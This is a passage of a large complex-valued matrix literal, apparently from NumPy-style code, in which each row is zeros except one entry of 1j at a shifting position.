0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
